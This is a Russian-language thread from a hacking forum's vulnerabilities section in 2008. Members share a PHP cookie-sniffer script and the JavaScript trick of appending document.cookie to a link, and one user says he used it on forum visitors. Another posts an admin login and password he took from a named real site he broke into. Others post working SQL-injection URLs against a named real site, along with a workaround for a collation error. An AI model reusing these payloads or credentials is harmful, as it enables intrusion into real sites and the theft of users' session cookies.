HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.05.2008, 20:51
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Он на ачате валяется=,на сайте кажись=)).Ссылку ща не помню ибо давнон е пользывался.Так же в гугле их много
 
Ответить с цитированием

  #2  
Старый 28.05.2008, 20:58
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

2maximkafun, омг, учи родной язык для начала .
PHP код:
<?php
$fp 
fopen("log.log""a");
fwrite($fp"FROM: ".$SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]);
fclose($fp);
?>
Этот сниффер записывает все данные в файл log.log, пришедшие методом "GET". Залей его на сервер и будет тебе счастье . Но мне кажется, что это не для тебя. Попробуй сервис - s.netsec.ru. Позволяет создавать индивидуальные снифферы без напряга, респект GreenBear! Только на серве тех. работы сейчас, ГринБир говорит, что скоро все будет
З.Ы. Тебя посадят.
 
Ответить с цитированием

  #3  
Старый 28.05.2008, 21:43
maximkafun
Новичок
Регистрация: 19.05.2008
Сообщений: 20
С нами: 9462166

Репутация: 0
По умолчанию

Цитата:
Сообщение от А®ТеS  
2maximkafun, омг, учи родной язык для начала .
PHP код:
<?php
$fp 
fopen("log.log""a");
fwrite($fp"FROM: ".$SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]);
fclose($fp);
?>
Этот сниффер записывает все данные в файл log.log, пришедшие методом "GET". Залей его на сервер и будет тебе счастье . Но мне кажется, что это не для тебя. Попробуй сервис - s.netsec.ru. Позволяет создавать индивидуальные снифферы без напряга, респект GreenBear! Только на серве тех. работы сейчас, ГринБир говорит, что скоро все будет
З.Ы. Тебя посадят.
хм...чтото он ничего не пишет кроме FROM: DATA:
ничего не принимает,или я чтто не так зделал...вснунул скрипт в страничку index.php, залил
на хост, на форуме создал темку из неё ссылку на страницу, сам переходил и пользователи переходили,но кроме этого "FROM: DATA:" ничего не пишет,что не так?
 
Ответить с цитированием

  #4  
Старый 28.05.2008, 21:02
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Народ,сломал тут сайт www.zaishu.com.оказалсо БОЯНским)(.тык вот из таблицы adminrights вытащил логин и пароль админа :

admin:zaishu62.В мускул доступа нет)).Но понт в том,что этот грёбаный акк никуда не подходит(даже после того,как я прошёлся по открытым портам аля фтп,8080,5100 и т.д.: ))).нашёл там папку админскую(название забыл()),пасс тож не подошёл.Помогите кто-нибудь узнать,от чего он)).
 
Ответить с цитированием

  #5  
Старый 28.05.2008, 22:02
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

Писал не проверяя просто.
PHP код:
<?php
$fp 
fopen("log.log""a");
fwrite($fp"FROM: ".$_SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]."\r\n");
fclose($fp);
?>
Так лучше. В DATA тоже ничего не будет, пока GET'ом что-нибудь не передать. Например, index.php?something. Кукисы на JS: +document.cookie добавлять к УРЛу ссылки на сниффер.
 
Ответить с цитированием

  #6  
Старый 28.05.2008, 22:46
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами: 9845611

Репутация: 17
По умолчанию

Zet36,хсс в самый раз,хтмл знаю,вот яву незнаю,пихала в формы её.буду пробовать
 
Ответить с цитированием

  #7  
Старый 28.05.2008, 23:11
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами: 9845611

Репутация: 17
По умолчанию

белая страница,наверна нету бага
 
Ответить с цитированием

  #8  
Старый 28.05.2008, 23:15
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами: 9650515

Репутация: 5
По умолчанию

http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,version()/* 5.0.15
пробуем ... ==> http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,table_name+from+INFORMATION_SCH EMA.TABLES/* Пишет Illegal mix of collations for operation 'UNION', вроде связано с кодировкой, но пробую кодировки и ниодна не подходит(((
 
Ответить с цитированием

  #9  
Старый 28.05.2008, 23:21
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Элементарно Ватсон, Аес решает

cmd> POST /index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(TABLE_N AME,0x71),0x71)+from+information_schema.tables/* HTTP/1.0
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 29.05.2008 в 00:27..
 
Ответить с цитированием

  #10  
Старый 28.05.2008, 23:22
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
С нами: 9650515

Репутация: 5
По умолчанию

Тьфу, забыл))))) спс!!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.